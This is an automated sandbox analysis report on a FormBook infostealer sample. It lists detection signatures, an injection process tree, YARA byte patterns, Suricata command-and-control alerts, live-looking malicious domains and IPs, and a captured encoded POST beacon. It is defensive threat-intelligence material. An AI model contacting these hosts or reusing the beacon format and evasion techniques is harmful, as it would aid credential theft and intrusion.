Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BP-50C26_20241220_082241.exe

Overview

General Information

Sample name:BP-50C26_20241220_082241.exe
Analysis ID:1585941
MD5:33d01c02e1bb141330aa8be95c21f1bf
SHA1:2dd0a42aa9c37455d21a1e0baa50c1055a606c89
SHA256:4f23853d15d1c7ddb80df75d6fa9d59a1b998c17f8585e785da245dfd2022be2
Tags:exeuser-cocaman
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • BP-50C26_20241220_082241.exe (PID: 2944 cmdline: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe" MD5: 33D01C02E1BB141330AA8BE95C21F1BF)
    • svchost.exe (PID: 6472 cmdline: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • gaJjobDqjDYWsfRWPZSKY.exe (PID: 3812 cmdline: "C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 4760 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • gaJjobDqjDYWsfRWPZSKY.exe (PID: 3200 cmdline: "C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6568 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2187412228.00000000032D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe", CommandLine: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe", ParentImage: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe, ParentProcessId: 2944, ParentProcessName: BP-50C26_20241220_082241.exe, ProcessCommandLine: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe", ProcessId: 6472, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe", CommandLine: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe", ParentImage: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe, ParentProcessId: 2944, ParentProcessName: BP-50C26_20241220_082241.exe, ProcessCommandLine: "C:\Users\user\Desktop\BP-50C26_20241220_082241.exe", ProcessId: 6472, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-08T14:59:27.901479+010020507451Malware Command and Control Activity Detected192.168.2.549767154.215.72.11080TCP
            2025-01-08T15:00:00.101207+010020507451Malware Command and Control Activity Detected192.168.2.549967116.50.37.24480TCP
            2025-01-08T15:01:21.693297+010020507451Malware Command and Control Activity Detected192.168.2.54998485.159.66.9380TCP
            2025-01-08T15:01:35.281359+010020507451Malware Command and Control Activity Detected192.168.2.54998891.195.240.9480TCP
            2025-01-08T15:01:56.879254+010020507451Malware Command and Control Activity Detected192.168.2.54999266.29.149.4680TCP
            2025-01-08T15:02:10.386888+010020507451Malware Command and Control Activity Detected192.168.2.549996195.110.124.13380TCP
            2025-01-08T15:02:40.141268+010020507451Malware Command and Control Activity Detected192.168.2.550000217.196.55.20280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: BP-50C26_20241220_082241.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.goldenjade-travel.com/fo8o/?Dvh=YnI07v&Ubhdm=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/?Dvh=YnI07v&Ubhdm=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==Avira URL Cloud: Label: malware
            Source: http://www.rssnewscast.com/fo8o/?Ubhdm=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&Dvh=YnI07vAvira URL Cloud: Label: malware
            Source: http://www.techchains.info/fo8o/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: BP-50C26_20241220_082241.exeReversingLabs: Detection: 36%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2187412228.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4509692516.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4507710541.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2187102525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2187890119.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4507743693.0000000002BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: BP-50C26_20241220_082241.exeJoe Sandbox ML: detected
            Source: BP-50C26_20241220_082241.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000000.2111344894.000000000093E000.00000002.00000001.01000000.00000004.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4506386913.000000000093E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: BP-50C26_20241220_082241.exe, 00000000.00000003.2038587974.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, BP-50C26_20241220_082241.exe, 00000000.00000003.2041836600.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2093566111.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095219887.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2187440788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2187440788.000000000369E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508062336.000000000321E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508062336.0000000003080000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2194533815.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2187698131.0000000002D1A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: BP-50C26_20241220_082241.exe, 00000000.00000003.2038587974.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, BP-50C26_20241220_082241.exe, 00000000.00000003.2041836600.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2093566111.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095219887.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2187440788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2187440788.000000000369E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.4508062336.000000000321E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508062336.0000000003080000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2194533815.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2187698131.0000000002D1A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2187228592.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2156302707.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000002.4506792247.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4506373948.000000000289E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508760294.00000000036AC000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2476352086.0000000035C4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4506373948.000000000289E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508760294.00000000036AC000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2476352086.0000000035C4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2187228592.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2156302707.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000003.00000002.4506792247.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C4C2A2 FindFirstFileExW,0_2_00C4C2A2
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C868EE FindFirstFileW,FindClose,0_2_00C868EE
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00C8698F
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C7D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C7D076
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C7D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C7D3A9
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C89642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C89642
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C8979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C8979D
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C7DBBE
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C89B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00C89B2B
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C85C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00C85C97
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0281BAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_0281BAB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax4_2_02809480
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi4_2_0280DD45
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h4_2_02DB053E

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49767 -> 154.215.72.110:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49967 -> 116.50.37.244:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49988 -> 91.195.240.94:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49996 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49984 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50000 -> 217.196.55.202:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49992 -> 66.29.149.46:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.joyesi.xyz
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: Joe Sandbox ViewIP Address: 154.215.72.110 154.215.72.110
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C8CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00C8CE44
            Source: global trafficHTTP traffic detected: GET /fo8o/?Dvh=YnI07v&Ubhdm=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Dvh=YnI07v&Ubhdm=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Dvh=YnI07v&Ubhdm=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Ubhdm=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&Dvh=YnI07v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Ubhdm=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&Dvh=YnI07v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Dvh=YnI07v&Ubhdm=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Ubhdm=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&Dvh=YnI07v HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
            Source: global trafficDNS traffic detected: DNS query: www.k9vyp11no3.cfd
            Source: global trafficDNS traffic detected: DNS query: www.shenzhoucui.com
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 206Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 55 62 68 64 6d 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 2b 79 4d 67 4b 55 66 37 6c 6e 42 53 54 58 45 45 48 35 64 65 51 72 61 55 31 34 63 4a 5a 61 50 52 57 73 55 6b 58 34 3d Data Ascii: 